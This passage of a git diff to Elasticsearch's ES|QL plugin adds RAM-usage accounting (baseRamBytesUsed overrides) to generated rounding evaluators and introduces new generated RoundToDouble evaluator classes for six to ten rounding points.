Edit {@code EvaluatorImplementer} instead. */ public final class RoundDoubleNoDecimalsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundDoubleNoDecimalsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundIntEvaluator.java index 034bad3fdc1a3..684576a288c34 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundIntEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + baseRamBytesUsed += decimals.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock valBlock, LongBlock decimalsBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundLongEvaluator.java index b72465cd14b8a..0757bacb4201b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class RoundLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -57,6 +60,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + baseRamBytesUsed += decimals.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock valBlock, LongBlock decimalsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble10Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble10Evaluator.java new file mode 100644 index 0000000000000..4072e5c7c16f7 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble10Evaluator.java @@ -0,0 +1,195 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DoubleBlock; +import org.elasticsearch.compute.data.DoubleVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToDouble}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. 
+ */ +public final class RoundToDouble10Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble10Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final double p6; + + private final double p7; + + private final double p8; + + private final double p9; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToDouble10Evaluator(Source source, EvalOperator.ExpressionEvaluator field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6, double p7, double p8, + double p9, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.p9 = p9; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (DoubleBlock fieldBlock = (DoubleBlock) field.eval(page)) { + DoubleVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { + try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendDouble(RoundToDouble.process(fieldBlock.getDouble(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8, this.p9)); + } + return result.build(); + } + } + + public DoubleVector eval(int positionCount, DoubleVector fieldVector) { + try(DoubleVector.FixedBuilder result = driverContext.blockFactory().newDoubleVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendDouble(p, RoundToDouble.process(fieldVector.getDouble(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8, this.p9)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToDouble10Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + ", p9=" + p9 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements 
EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final double p6; + + private final double p7; + + private final double p8; + + private final double p9; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6, double p7, double p8, + double p9) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.p9 = p9; + } + + @Override + public RoundToDouble10Evaluator get(DriverContext context) { + return new RoundToDouble10Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, p8, p9, context); + } + + @Override + public String toString() { + return "RoundToDouble10Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + ", p9=" + p9 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble1Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble1Evaluator.java index baf436c31448e..51519b3828d0c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble1Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble1Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
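RoundToDouble10Evaluator above is one of several newly generated fixed-arity specializations (RoundToDouble6 through RoundToDouble10 in this diff, with RoundToInt counterparts further down): the rounding points are baked into plain double fields p0..p9, so each row is handled by straight-line comparisons in RoundToDouble.process rather than a per-row loop over an array. A hedged sketch of the idea, assuming ROUND_TO's round-down-to-nearest-point semantics (values below the smallest point clamp to it); the real logic lives in the generated RoundToDouble.process overloads:

// Hypothetical three-point specialization; p0 <= p1 <= p2 assumed sorted.
final class RoundTo3Sketch {
    private final double p0, p1, p2;

    RoundTo3Sketch(double p0, double p1, double p2) {
        this.p0 = p0;
        this.p1 = p1;
        this.p2 = p2;
    }

    // Round v down to the largest point <= v; clamp to p0 below the range.
    double process(double v) {
        if (v >= p2) {
            return p2;
        }
        if (v >= p1) {
            return p1;
        }
        return p0;
    }
}

The points arrive once through the Factory at plan time, so the per-row work is a handful of branch-predictable compares with no array indirection.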
*/ public final class RoundToDouble1Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble1Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble2Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble2Evaluator.java index 5c61e26a2d2cc..ce1d693e8c057 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble2Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble2Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToDouble2Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble2Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble3Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble3Evaluator.java index 002f05385d3b2..caf29fb804761 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble3Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble3Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class RoundToDouble3Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble3Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -57,6 +60,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble4Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble4Evaluator.java index 58dac768f76f1..791a22822f5af 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble4Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble4Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToDouble4Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble4Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -60,6 +63,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble6Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble6Evaluator.java new file mode 100644 index 0000000000000..63928ea2a277d --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble6Evaluator.java @@ -0,0 +1,169 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. 
+package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DoubleBlock; +import org.elasticsearch.compute.data.DoubleVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToDouble}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToDouble6Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble6Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToDouble6Evaluator(Source source, EvalOperator.ExpressionEvaluator field, double p0, + double p1, double p2, double p3, double p4, double p5, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (DoubleBlock fieldBlock = (DoubleBlock) field.eval(page)) { + DoubleVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { + try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendDouble(RoundToDouble.process(fieldBlock.getDouble(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5)); + } + return result.build(); + } + } + + public DoubleVector eval(int positionCount, DoubleVector fieldVector) { + try(DoubleVector.FixedBuilder result = driverContext.blockFactory().newDoubleVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendDouble(p, RoundToDouble.process(fieldVector.getDouble(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToDouble6Evaluator[" + "field=" + field + ", p0=" + p0 + 
", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, double p0, + double p1, double p2, double p3, double p4, double p5) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + } + + @Override + public RoundToDouble6Evaluator get(DriverContext context) { + return new RoundToDouble6Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, context); + } + + @Override + public String toString() { + return "RoundToDouble6Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble7Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble7Evaluator.java new file mode 100644 index 0000000000000..0a5d78954928b --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble7Evaluator.java @@ -0,0 +1,176 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DoubleBlock; +import org.elasticsearch.compute.data.DoubleVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToDouble}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. 
+ */ +public final class RoundToDouble7Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble7Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final double p6; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToDouble7Evaluator(Source source, EvalOperator.ExpressionEvaluator field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6, + DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (DoubleBlock fieldBlock = (DoubleBlock) field.eval(page)) { + DoubleVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { + try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendDouble(RoundToDouble.process(fieldBlock.getDouble(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6)); + } + return result.build(); + } + } + + public DoubleVector eval(int positionCount, DoubleVector fieldVector) { + try(DoubleVector.FixedBuilder result = driverContext.blockFactory().newDoubleVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendDouble(p, RoundToDouble.process(fieldVector.getDouble(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToDouble7Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private 
final double p5; + + private final double p6; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + } + + @Override + public RoundToDouble7Evaluator get(DriverContext context) { + return new RoundToDouble7Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, context); + } + + @Override + public String toString() { + return "RoundToDouble7Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble8Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble8Evaluator.java new file mode 100644 index 0000000000000..2de9a4c7e0f0f --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToDouble8Evaluator.java @@ -0,0 +1,182 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DoubleBlock; +import org.elasticsearch.compute.data.DoubleVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToDouble}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. 
+ */ +public final class RoundToDouble8Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToDouble8Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final double p0; + + private final double p1; + + private final double p2; + + private final double p3; + + private final double p4; + + private final double p5; + + private final double p6; + + private final double p7; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToDouble8Evaluator(Source source, EvalOperator.ExpressionEvaluator field, double p0, + double p1, double p2, double p3, double p4, double p5, double p6, double p7, + DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (DoubleBlock fieldBlock = (DoubleBlock) field.eval(page)) { + DoubleVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock) { + try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { + position: for (int p = 0; 